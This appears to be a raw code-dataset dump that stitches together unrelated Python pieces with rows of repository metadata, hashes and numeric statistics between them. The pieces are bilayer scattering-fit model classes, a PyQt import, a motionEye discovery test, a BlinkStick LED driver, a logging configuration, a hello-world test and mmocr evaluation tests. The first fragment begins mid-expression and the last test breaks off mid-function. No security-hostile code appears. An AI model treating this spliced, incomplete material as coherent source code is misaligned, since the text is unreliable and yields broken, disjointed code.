rhoHeadIn, zHeadIn, sigmaHeadIn,
-1, sigmaTail,
rhoHeadOut, zHeadOut, sigmaHeadOut,
rhoGuestOut, zGuestOut, sigmaGuestOut,
dbilayer, ddbilayer,
int(Nbilayer), int(Ndistrib)) +\
A*(1-x_oligolam)* ISSVasymm(x, R0, dR, rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHeadIn, zHeadIn, sigmaHeadIn,
-1, sigmaTail,
rhoHeadOut, zHeadOut, sigmaHeadOut,
rhoGuestOut, zGuestOut, sigmaGuestOut,
dbilayer, ddbilayer,
1, int(Ndistrib)) + \
bg
def visualize(self, fig:Figure, x:Union[np.ndarray, float], *args, **kwargs):
ax=fig.add_subplot(1,1,1)
(A, bg, R0, dR,
rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHeadIn, zHeadIn, sigmaHeadIn,
sigmaTail,
rhoHeadOut, zHeadOut, sigmaHeadOut,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
self._plotgaussians(ax, R0, dbilayer, Nbilayer, [
(rhoGuestIn, -zGuestIn, sigmaGuestIn, 'Inner guest'),
(rhoHeadIn, -zHeadIn, sigmaHeadIn, 'Inner head'),
(-1, 0, sigmaTail, 'Carbon chain'),
(rhoHeadOut, zHeadOut, sigmaHeadOut, 'Outer head'),
(rhoGuestOut, zGuestOut, sigmaGuestOut, 'Outer guest')
])
fig.canvas.draw()
@staticmethod
def _gaussian(x, A, x0, sigma):
# the area under the peak must be 4*pi*sqrt(2*pi*sigma**2)*(x0**2+sigma**2)
if sigma==0:
return np.zeros_like(x)
return A*np.exp(-(x-x0)**2/(2*sigma**2))
def _plotgaussians(self, axes:Axes, R0:float, d:float, Nbilayers:int, values:List[Tuple[float,float,float,str]]):
Nbilayers = 1
zmin = min([(z0-3*sigma) for rho, z0, sigma, label in values])+R0
zmax = max([z0+3*sigma for rho, z0, sigma, label in values])+R0+(Nbilayers-1)*d
z=np.linspace(zmin,zmax,1000)
total=0
for rho, z0, sigma, label in values:
y=0
for i in range(Nbilayers):
y += self._gaussian(z, rho, R0+z0+i*d, sigma)
axes.plot(z,y,'-',label=label)
total += y
axes.plot(z, total, 'k-', label='Total')
if R0 == 0:
axes.set_xlabel('Distance from the bilayer center (nm)')
else:
axes.set_xlabel('Radius (nm)')
axes.set_ylabel('Relative electron density')
axes.grid(True, which='both')
axes.legend(loc='best')
class GaussianBilayerAsymmGuest(GaussianBilayerAsymm):
name = 'gaussian_bilayer_asymm_Guest'
description = 'Symmetric gaussian bilayer with asymmetric guest layers'
parameters = [ParameterDefinition('A', 'outer intensity scaling factor', 9.1e-12, lbound=0),
ParameterDefinition('bg', 'constant background', 0.00272, lbound=0),
ParameterDefinition('R0', 'radius of the innermost bilayer', 37.1, lbound=0),
ParameterDefinition('dR', 'hwhm of the radius of the innermost bilayer', 0.025, lbound=0),
ParameterDefinition('rhoGuestIn', 'relative electron density of the inner guest molecule layer (tail is -1)', 0),
ParameterDefinition('zGuestIn', 'distance of the inner guest molecule layer from the bilayer center',
1.6903, lbound=0),
ParameterDefinition('sigmaGuestIn', 'HWHM of the inner guest molecule layer', 0.659, lbound=0),
ParameterDefinition('rhoHead', 'relative electron density of the headgroup layers (tail is -1)', 0.21787),
ParameterDefinition('zHead', 'distance of the headgroup layers from the bilayer center',
1.6903, lbound=0),
ParameterDefinition('sigmaHead', 'HWHM of the headgroup layers', 0.132, lbound=0),
ParameterDefinition('sigmaTail', 'HWHM of the tail layer', 0.80258, lbound=0),
ParameterDefinition('rhoGuestOut',
'relative electron density of the outer guest molecule layer (tail is -1)', 0),
ParameterDefinition('zGuestOut', 'distance of the outer guest molecule layer from the bilayer center',
1.6903, lbound=0),
ParameterDefinition('sigmaGuestOut', 'HWHM of the outer guest molecule layer', 0.2799, lbound=0),
ParameterDefinition('x_oligolam', 'Proportion of oligolamellarity',0.127,lbound=0, ubound=1),
ParameterDefinition('dbilayer', 'Periodic repeat distance of the bilayers', 7.299164, lbound=0),
ParameterDefinition('ddbilayer', 'HWHM of the periodic repeat distance of the bilayers', 0.14581464, lbound=0),
ParameterDefinition('Nbilayer', 'Number of bilayers', 2, lbound=1, fittable=False, coerce_type=int),
ParameterDefinition('Ndistrib', 'Size distribution integration count', 70, lbound=1, fittable=False, coerce_type=int),
]
def fitfunction(self, x:Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return super().fitfunction(x, A, bg, R0, dR, rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoHead, zHead, sigmaHead,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam, dbilayer, ddbilayer, Nbilayer, Ndistrib)
def visualize(self, fig:Figure, x:Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return super().visualize(fig, x, A, bg, R0, dR, rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoHead, zHead, sigmaHead,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam, dbilayer, ddbilayer, Nbilayer, Ndistrib)
class GaussianBilayerSymm(GaussianBilayerAsymm):
name = 'gaussian_bilayer_symm'
description = 'Symmetric gaussian bilayer with symmetric guest layers'
parameters = [ParameterDefinition('A', 'outer intensity scaling factor', 1, lbound=0),
ParameterDefinition('bg', 'constant background', 0, lbound=0),
ParameterDefinition('R0', 'radius of the innermost bilayer', 40, lbound=0),
ParameterDefinition('dR', 'hwhm of the radius of the innermost bilayer', 5, lbound=0),
ParameterDefinition('rhoGuest',
'relative electron density of the guest molecule layers (tail is -1)', 0),
ParameterDefinition('zGuest', 'distance of the guest molecule layers from the bilayer center',
10, lbound=0),
ParameterDefinition('sigmaGuest', 'HWHM of the guest molecule layers', 5, lbound=0),
ParameterDefinition('rhoHead', 'relative electron density of the headgroup layers (tail is -1)', 1),
ParameterDefinition('zHead', 'distance of the headgroup layers from the bilayer center',
2.5, lbound=0),
ParameterDefinition('sigmaHead', 'HWHM of the headgroup layers', 5, lbound=0),
ParameterDefinition('sigmaTail', 'HWHM of the tail layer', 1, lbound=0),
ParameterDefinition('x_oligolam', 'Proportion of oligolamellarity', 0.5, lbound=0, ubound=1),
ParameterDefinition('dbilayer', 'Periodic repeat distance of the bilayers', 6.4, lbound=0),
ParameterDefinition('ddbilayer', 'HWHM of the periodic repeat distance of the bilayers', 0.1,
lbound=0),
ParameterDefinition('Nbilayer', 'Number of bilayers', 2, lbound=1, fittable=False, coerce_type=int),
ParameterDefinition('Ndistrib', 'Size distribution integration count', 70, lbound=1, fittable=False,
coerce_type=int),
]
def fitfunction(self, x: Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuest, zGuest, sigmaGuest,
rhoHead, zHead, sigmaHead,
sigmaTail,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return super().fitfunction(x, A, bg, R0, dR, rhoGuest, zGuest, sigmaGuest,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoHead, zHead, sigmaHead,
rhoGuest, zGuest, sigmaGuest,
x_oligolam, dbilayer, ddbilayer, Nbilayer, Ndistrib)
def visualize(self, fig: Figure, x: Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuest, zGuest, sigmaGuest,
rhoHead, zHead, sigmaHead,
sigmaTail,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return super().visualize(fig, x, A, bg, R0, dR, rhoGuest, zGuest, sigmaGuest,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoHead, zHead, sigmaHead,
rhoGuest, zGuest, sigmaGuest,
x_oligolam, dbilayer, ddbilayer, Nbilayer, Ndistrib)
| 59.05
| 136
| 0.566681
| 1,378
| 14,172
| 5.800435
| 0.144412
| 0.030026
| 0.126861
| 0.037158
| 0.815964
| 0.785562
| 0.773677
| 0.750782
| 0.744777
| 0.697736
| 0
| 0.027113
| 0.336367
| 14,172
| 239
| 137
| 59.297071
| 0.822754
| 0.005151
| 0
| 0.580357
| 0
| 0
| 0.229198
| 0.005037
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.026786
| 0
| 0.15625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8c8e5669d1e87fb834f003af9ce89b2e8f8e6674
| 36
|
py
|
Python
|
pyqt_style_setter/__init__.py
|
yjg30737/pyqt_style_setter
|
2d3db7fd7ed71dd4b2644c868029f9913841b648
|
[
"MIT"
] | null | null | null |
pyqt_style_setter/__init__.py
|
yjg30737/pyqt_style_setter
|
2d3db7fd7ed71dd4b2644c868029f9913841b648
|
[
"MIT"
] | null | null | null |
pyqt_style_setter/__init__.py
|
yjg30737/pyqt_style_setter
|
2d3db7fd7ed71dd4b2644c868029f9913841b648
|
[
"MIT"
] | null | null | null |
from .styleSetter import StyleSetter
| 36
| 36
| 0.888889
| 4
| 36
| 8
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 36
| 1
| 36
| 36
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8c9ab2b3f8283aa6ee867d4ec188e306d5860b00
| 441
|
py
|
Python
|
tests/discovery/test_motioneye.py
|
pnjongang/supervisor
|
2a006ae76de4b06e3e291b37aa2a4e14dc272445
|
[
"Apache-2.0"
] | 597
|
2017-04-27T15:10:08.000Z
|
2019-12-18T16:02:57.000Z
|
tests/discovery/test_motioneye.py
|
pnjongang/supervisor
|
2a006ae76de4b06e3e291b37aa2a4e14dc272445
|
[
"Apache-2.0"
] | 799
|
2017-05-02T00:26:07.000Z
|
2019-12-18T21:40:18.000Z
|
tests/discovery/test_motioneye.py
|
pnjongang/supervisor
|
2a006ae76de4b06e3e291b37aa2a4e14dc272445
|
[
"Apache-2.0"
] | 173
|
2017-04-26T17:03:42.000Z
|
2019-12-15T10:41:57.000Z
|
"""Test motionEye discovery."""
import pytest
import voluptuous as vol
from supervisor.discovery.validate import valid_discovery_config
def test_good_config() -> None:
    """A motionEye payload containing a url passes discovery validation."""
    good_payload = {"url": "http://example.com:1234"}
    valid_discovery_config("motioneye", good_payload)
def test_bad_config() -> None:
    """An empty motionEye payload is rejected with vol.Invalid."""
    empty_payload: dict = {}
    with pytest.raises(vol.Invalid):
        valid_discovery_config("motioneye", empty_payload)
| 24.5
| 75
| 0.709751
| 53
| 441
| 5.716981
| 0.471698
| 0.138614
| 0.19802
| 0.191419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010667
| 0.14966
| 441
| 17
| 76
| 25.941176
| 0.797333
| 0.181406
| 0
| 0
| 0
| 0
| 0.127536
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.375
| 0
| 0.625
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8cc5584839c1c6356456528af689164edcad2ed7
| 1,530
|
py
|
Python
|
archive/LEDs.py
|
Guillermo-Hidalgo-Gadea/RPi4Toolbox
|
47a265aa9828f144155c097efc8ff36bd435099f
|
[
"MIT"
] | null | null | null |
archive/LEDs.py
|
Guillermo-Hidalgo-Gadea/RPi4Toolbox
|
47a265aa9828f144155c097efc8ff36bd435099f
|
[
"MIT"
] | null | null | null |
archive/LEDs.py
|
Guillermo-Hidalgo-Gadea/RPi4Toolbox
|
47a265aa9828f144155c097efc8ff36bd435099f
|
[
"MIT"
] | 1
|
2021-10-15T16:14:48.000Z
|
2021-10-15T16:14:48.000Z
|
from blinkstick import blinkstick
class LED:
    """Drives two BlinkStick LED strips (8 addressable LEDs each) as a unit.

    Replaces 32 copy-pasted ``set_color`` calls with a single loop helper;
    behavior is unchanged: ``on()`` lights every LED red, ``off()`` blanks
    every LED.
    """

    # Number of addressable LEDs on each stick (indices 0..7 in the original).
    _NUM_LEDS = 8

    def __init__(self):
        # find_all() returns every connected BlinkStick; this class assumes
        # at least two are plugged in (IndexError is raised otherwise).
        devices = blinkstick.find_all()
        self.LED1 = devices[0]
        self.LED2 = devices[1]

    def _fill(self, red, green, blue):
        """Apply one RGB colour to every LED on both sticks.

        set_color(channel, index, red, green, blue) — channel 0, per-LED
        index, matching the original call pattern.
        """
        for stick in (self.LED1, self.LED2):
            for index in range(self._NUM_LEDS):
                stick.set_color(0, index, red, green, blue)

    def on(self):
        """Light all LEDs red (255, 0, 0), as in the original code."""
        self._fill(255, 0, 0)

    def off(self):
        """Turn all LEDs off (colour 0, 0, 0)."""
        self._fill(0, 0, 0)
| 32.553191
| 41
| 0.565359
| 315
| 1,530
| 2.628571
| 0.08254
| 0.130435
| 0.347826
| 0.309179
| 0.859903
| 0.859903
| 0.859903
| 0.821256
| 0
| 0
| 0
| 0.199475
| 0.252941
| 1,530
| 46
| 42
| 33.26087
| 0.524934
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075
| false
| 0
| 0.025
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8cd9f21a5ddd5824f31e827fe7fd55943ff05ef5
| 3,773
|
py
|
Python
|
get_config.py
|
0dminnimda/NTO_bigdata_2020_final
|
db866b59782513d39d9ceabdbc4ebb69cd638872
|
[
"MIT"
] | null | null | null |
get_config.py
|
0dminnimda/NTO_bigdata_2020_final
|
db866b59782513d39d9ceabdbc4ebb69cd638872
|
[
"MIT"
] | null | null | null |
get_config.py
|
0dminnimda/NTO_bigdata_2020_final
|
db866b59782513d39d9ceabdbc4ebb69cd638872
|
[
"MIT"
] | null | null | null |
# import yaml
# print(yaml.safe_load("""---
# version: 1
# disable_existing_loggers: False
# formatters:
# simple:
# format: '[%(levelname)s] [%(asctime)s:%(name)s] %(message)s'
# handlers:
# console:
# class: logging.StreamHandler
# level: WARNING
# formatter: simple
# stream: ext://sys.stdout
# file_handler:
# class: logging.FileHandler
# level: DEBUG
# formatter: simple
# filename: autosklearn.log
# distributed_logfile:
# class: logging.FileHandler
# level: DEBUG
# formatter: simple
# filename: distributed.log
# root:
# level: CRITICAL
# handlers: [console, file_handler]
# loggers:
# autosklearn.metalearning:
# level: NOTSET
# handlers: [file_handler]
# propagate: no
# autosklearn.automl_common.common.utils.backend:
# level: DEBUG
# handlers: [file_handler]
# propagate: no
# smac.intensification.intensification.Intensifier:
# level: INFO
# handlers: [file_handler, console]
# smac.optimizer.local_search.LocalSearch:
# level: INFO
# handlers: [file_handler, console]
# smac.optimizer.smbo.SMBO:
# level: INFO
# handlers: [file_handler, console]"""))
# {'version': 1, 'disable_existing_loggers': False,
# 'formatters':
# {'simple': {'format': '[%(levelname)s] [%(asctime)s:%(name)s] %(message)s'}},
# 'handlers':
# {
# 'console':
# {'class': 'logging.StreamHandler', 'level': 'WARNING', 'formatter': 'simple',
# 'stream': 'ext://sys.stdout'},
# 'file_handler':
# {'class': 'logging.FileHandler', 'level': 'DEBUG', 'formatter': 'simple',
# 'filename': 'autosklearn.log'},
# 'distributed_logfile':
# {'class': 'logging.FileHandler', 'level': 'DEBUG', 'formatter': 'simple',
# 'filename': 'distributed.log'}},
# 'root': {'level': 'CRITICAL', 'handlers': ['console', 'file_handler']},
# 'loggers':
# {
# 'autosklearn.metalearning':
# {'level': 'NOTSET', 'handlers': ['file_handler'],
# 'propagate': False},
# 'autosklearn.automl_common.common.utils.backend':
# {'level': 'DEBUG', 'handlers': ['file_handler'],
# 'propagate': False},
# 'smac.intensification.intensification.Intensifier':
# {'level': 'INFO', 'handlers': ['file_handler', 'console']},
# 'smac.optimizer.local_search.LocalSearch':
# {'level': 'INFO', 'handlers': ['file_handler', 'console']},
# 'smac.optimizer.smbo.SMBO':
# {'level': 'INFO', 'handlers': ['file_handler', 'console']}}}
# Logging configuration dict in the logging.config.dictConfig schema
# (active replacement for the commented-out YAML above).
config = {
    "version": 1,
    # Keep loggers that were configured before this dict is applied.
    "disable_existing_loggers": False,
    "formatters": {
        "simple": {"format": "[%(levelname)s] [%(asctime)s:%(name)s] %(message)s"}
    },
    "handlers": {
        # Only a console handler is defined here; the file handlers from the
        # original YAML were dropped.
        "console": {
            "class": "logging.StreamHandler",
            "level": "INFO",
            "formatter": "simple",
            "stream": "ext://sys.stdout",
        },
    },
    # "root": {"level": "CRITICAL", "handlers": ["console", "file_handler"]},
    "loggers": {
        # NOTE(review): the logger entries below still reference a
        # "file_handler" that is not defined in "handlers" above (it exists
        # only in the commented-out YAML). logging.config.dictConfig() would
        # reject this with "Unable to set handler 'file_handler'" — confirm
        # how this dict is actually consumed.
        "autosklearn.metalearning": {
            "level": "NOTSET",
            "handlers": ["file_handler"],
            "propagate": False,
        },
        "autosklearn.automl_common.common.utils.backend": {
            "level": "DEBUG",
            "handlers": ["file_handler"],
            "propagate": False,
        },
        "smac.intensification.intensification.Intensifier": {
            "level": "INFO",
            "handlers": ["file_handler", "console"],
        },
        "smac.optimizer.local_search.LocalSearch": {
            "level": "INFO",
            "handlers": ["file_handler", "console"],
        },
        "smac.optimizer.smbo.SMBO": {
            "level": "INFO",
            "handlers": ["file_handler", "console"],
        },
    },
}
| 29.476563
| 84
| 0.566393
| 328
| 3,773
| 6.408537
| 0.182927
| 0.104662
| 0.135585
| 0.089914
| 0.982398
| 0.980495
| 0.964795
| 0.964795
| 0.964795
| 0.964795
| 0
| 0.001047
| 0.240657
| 3,773
| 127
| 85
| 29.708661
| 0.732635
| 0.64458
| 0
| 0.282051
| 0
| 0
| 0.44664
| 0.196047
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
50e5608bd3ac9a30f8f952faa5f24c99bdaefef7
| 82
|
py
|
Python
|
hello_test.py
|
wisdombeyonddata/tell
|
b81e870add61e06056373f283511ae805f697817
|
[
"MIT"
] | null | null | null |
hello_test.py
|
wisdombeyonddata/tell
|
b81e870add61e06056373f283511ae805f697817
|
[
"MIT"
] | null | null | null |
hello_test.py
|
wisdombeyonddata/tell
|
b81e870add61e06056373f283511ae805f697817
|
[
"MIT"
] | null | null | null |
import hello;
def test_hello():
    """hello.hello_world() must return the canonical greeting string."""
    greeting = hello.hello_world()
    assert greeting == "Hello World!"
| 16.4
| 48
| 0.682927
| 11
| 82
| 4.909091
| 0.545455
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 82
| 4
| 49
| 20.5
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
50fbdd4da9bd4138015329cdbbe84bc2f5e40584
| 14,258
|
py
|
Python
|
tests/test_metrics/test_eval_utils.py
|
Yuliang-Liu/mmocr
|
d683b142838c2e25cbff35191ed189bbb3790fff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_metrics/test_eval_utils.py
|
Yuliang-Liu/mmocr
|
d683b142838c2e25cbff35191ed189bbb3790fff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_metrics/test_eval_utils.py
|
Yuliang-Liu/mmocr
|
d683b142838c2e25cbff35191ed189bbb3790fff
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) OpenMMLab. All rights reserved.
"""Tests the utils of evaluation."""
import numpy as np
import pytest
import mmocr.core.evaluation.utils as utils
def test_ignore_pred():
    """Test utils.ignore_pred: argument validation and don't-care filtering."""
    # test invalid arguments
    box = [0, 0, 1, 0, 1, 1, 0, 1]
    det_boxes = [box]
    gt_dont_care_index = [0]
    gt_polys = [utils.points2polygon(box)]
    precision_thr = 0.5
    # det_boxes must be a list, not a scalar.
    with pytest.raises(AssertionError):
        det_boxes_tmp = 1
        utils.ignore_pred(det_boxes_tmp, gt_dont_care_index, gt_polys,
                          precision_thr)
    # gt_dont_care_index must be a list, not a scalar.
    with pytest.raises(AssertionError):
        gt_dont_care_index_tmp = 1
        utils.ignore_pred(det_boxes, gt_dont_care_index_tmp, gt_polys,
                          precision_thr)
    # gt_polys must be a list of polygons, not a scalar.
    with pytest.raises(AssertionError):
        gt_polys_tmp = 1
        utils.ignore_pred(det_boxes, gt_dont_care_index, gt_polys_tmp,
                          precision_thr)
    # precision_thr must not exceed 1.
    with pytest.raises(AssertionError):
        precision_thr_tmp = 1.1
        utils.ignore_pred(det_boxes, gt_dont_care_index, gt_polys,
                          precision_thr_tmp)
    # test ignored cases
    # Detection 0 overlaps a don't-care gt, so result[2] flags index 0.
    result = utils.ignore_pred(det_boxes, gt_dont_care_index, gt_polys,
                               precision_thr)
    assert result[2] == [0]
    # test unignored cases
    # With no don't-care gts nothing is ignored.
    gt_dont_care_index_tmp = []
    result = utils.ignore_pred(det_boxes, gt_dont_care_index_tmp, gt_polys,
                               precision_thr)
    assert result[2] == []
    # A detection far from the don't-care gt is also kept.
    det_boxes_tmp = [[10, 10, 15, 10, 15, 15, 10, 15]]
    result = utils.ignore_pred(det_boxes_tmp, gt_dont_care_index, gt_polys,
                               precision_thr)
    assert result[2] == []
def test_compute_hmean():
    """compute_hmean rejects non-int arguments and returns the h-mean last."""
    # Each tuple below contains exactly one non-int argument; all must fail.
    bad_arg_sets = [
        (0, 0, 0.0, 0),
        (0, 0, 0, 0.0),
        ([1], 0, 0, 0),
        (0, [1], 0, 0),
    ]
    for bad_args in bad_arg_sets:
        with pytest.raises(AssertionError):
            utils.compute_hmean(*bad_args)
    # Fully matched counts -> hmean 1; nothing matched -> hmean 0.
    assert utils.compute_hmean(2, 2, 2, 2)[2] == 1
    assert utils.compute_hmean(0, 0, 2, 2)[2] == 0
def test_points2polygon():
    """points2polygon accepts flat, even-length coordinate sequences only."""
    # A bare scalar is not a valid point sequence.
    with pytest.raises(AssertionError):
        utils.points2polygon(2)
    # Odd length (7) and too few coordinates (6) are both rejected.
    for bad_points in ([1, 2, 3, 4, 5, 6, 7], [1, 2, 3, 4, 5, 6]):
        with pytest.raises(AssertionError):
            utils.points2polygon(bad_points)
    # Both an ndarray and a plain list of 8 values yield a 4-point polygon.
    coords = [1, 2, 3, 4, 5, 6, 7, 8]
    for points in (np.array(coords), coords):
        poly = utils.points2polygon(points)
        assert poly.nPoints() == 4
def test_poly_intersection():
    """poly_intersection needs polygon inputs and returns the shared area."""
    # Scalars are rejected.
    with pytest.raises(AssertionError):
        utils.poly_intersection(0, 1)
    unit_square = utils.points2polygon([0, 0, 0, 1, 1, 1, 1, 0])
    far_away = utils.points2polygon([10, 20, 30, 40, 50, 60, 70, 80])
    # Disjoint polygons share no area.
    assert utils.poly_intersection(unit_square, far_away)[0] == 0
    # A polygon intersected with itself keeps its full (unit) area.
    assert utils.poly_intersection(unit_square, unit_square)[0] == 1
def test_poly_union():
    """poly_union needs polygon inputs and returns the combined area."""
    # Scalars are rejected.
    with pytest.raises(AssertionError):
        utils.poly_union(0, 1)
    square_a = utils.points2polygon([0, 0, 0, 1, 1, 1, 1, 0])
    square_b = utils.points2polygon([2, 2, 2, 3, 3, 3, 3, 2])
    # Two disjoint unit squares -> area 2; a polygon with itself -> area 1.
    assert utils.poly_union(square_a, square_b) == 2
    assert utils.poly_union(square_a, square_a) == 1
def test_poly_iou():
    """poly_iou rejects non-polygon input and computes intersection/union."""
    # Plain lists are rejected.
    with pytest.raises(AssertionError):
        utils.poly_iou([1], [2])
    unit_square = utils.points2polygon([0, 0, 0, 1, 1, 1, 1, 0])
    far_away = utils.points2polygon([10, 20, 30, 40, 50, 60, 70, 80])
    # Disjoint polygons -> IoU 0; identical polygons -> IoU 1.
    assert utils.poly_iou(unit_square, far_away) == 0
    assert utils.poly_iou(unit_square, unit_square) == 1
def test_boundary_iou():
    """boundary_iou works on raw point lists rather than polygon objects."""
    unit_square = [0, 0, 0, 1, 1, 1, 1, 0]
    far_away = [10, 20, 30, 40, 50, 60, 70, 80]
    # Disjoint boundaries -> 0; identical boundaries -> 1.
    assert utils.boundary_iou(unit_square, far_away) == 0
    assert utils.boundary_iou(unit_square, unit_square) == 1
def test_points_center():
    """points_center requires an even-length ndarray of coordinates."""
    # A plain list is rejected.
    with pytest.raises(AssertionError):
        utils.points_center([1])
    # An odd number of coordinates is rejected.
    with pytest.raises(AssertionError):
        utils.points_center(np.array([1, 2, 3]))
    # Mean of points (1, 2) and (3, 4) is (2, 3).
    center = utils.points_center(np.array([1, 2, 3, 4]))
    assert np.array_equal(center, np.array([2, 3]))
def test_point_distance():
    """point_distance requires two 2-element ndarrays."""
    # Plain lists are rejected.
    with pytest.raises(AssertionError):
        utils.point_distance([1, 2], [1, 2])
    # A 3-element ndarray is rejected.
    with pytest.raises(AssertionError):
        too_long = np.array([1, 2, 3])
        utils.point_distance(too_long, too_long)
    origin = np.array([1, 2])
    shifted = np.array([2, 2])
    # Zero distance to itself; unit distance to a point one step away.
    assert utils.point_distance(origin, origin) == 0
    assert utils.point_distance(origin, shifted) == 1
def test_box_center_distance():
    """Distance between the centres of two boxes; expected result is 1."""
    box_a = np.array([1, 1, 3, 3])
    box_b = np.array([2, 2, 4, 2])
    assert utils.box_center_distance(box_a, box_b) == 1
def test_box_diag():
    """box_diag requires an 8-element ndarray (4 corner points)."""
    # A plain list is rejected.
    with pytest.raises(AssertionError):
        utils.box_diag([1, 2])
    # Too few coordinates are rejected.
    with pytest.raises(AssertionError):
        utils.box_diag(np.array([1, 2, 3, 4]))
    # For these corners the expected diagonal length is 10.
    corners = np.array([0, 0, 1, 1, 0, 10, -10, 0])
    assert utils.box_diag(corners) == 10
def test_one2one_match_ic13():
    """Test utils.one2one_match_ic13: validation and one-to-one matching."""
    gt_id = 0
    det_id = 0
    recall_mat = np.array([[1, 0], [0, 0]])
    precision_mat = np.array([[1, 0], [0, 0]])
    recall_thr = 0.5
    precision_thr = 0.5
    # test invalid arguments.
    # ids must be ints, matrices must be ndarrays, thresholds must be <= 1.
    with pytest.raises(AssertionError):
        utils.one2one_match_ic13(0.0, det_id, recall_mat, precision_mat,
                                 recall_thr, precision_thr)
    with pytest.raises(AssertionError):
        utils.one2one_match_ic13(gt_id, 0.0, recall_mat, precision_mat,
                                 recall_thr, precision_thr)
    with pytest.raises(AssertionError):
        utils.one2one_match_ic13(gt_id, det_id, [0, 0], precision_mat,
                                 recall_thr, precision_thr)
    with pytest.raises(AssertionError):
        utils.one2one_match_ic13(gt_id, det_id, recall_mat, [0, 0], recall_thr,
                                 precision_thr)
    with pytest.raises(AssertionError):
        utils.one2one_match_ic13(gt_id, det_id, recall_mat, precision_mat, 1.1,
                                 precision_thr)
    with pytest.raises(AssertionError):
        utils.one2one_match_ic13(gt_id, det_id, recall_mat, precision_mat,
                                 recall_thr, 1.1)
    # A single (gt 0, det 0) entry above both thresholds matches.
    assert utils.one2one_match_ic13(gt_id, det_id, recall_mat, precision_mat,
                                    recall_thr, precision_thr)
    # With an extra 0.6 entry in the same column the match no longer holds.
    recall_mat = np.array([[1, 0], [0.6, 0]])
    precision_mat = np.array([[1, 0], [0.6, 0]])
    assert not utils.one2one_match_ic13(
        gt_id, det_id, recall_mat, precision_mat, recall_thr, precision_thr)
    # Likewise for an extra 0.6 entry in the same row.
    recall_mat = np.array([[1, 0.6], [0, 0]])
